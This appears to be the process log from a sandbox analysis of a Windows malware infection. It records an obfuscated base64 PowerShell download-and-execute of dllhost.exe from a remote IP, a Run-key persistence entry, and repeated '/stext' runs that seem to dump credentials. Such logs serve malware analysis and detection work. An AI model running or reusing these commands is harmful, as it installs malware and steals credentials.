          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
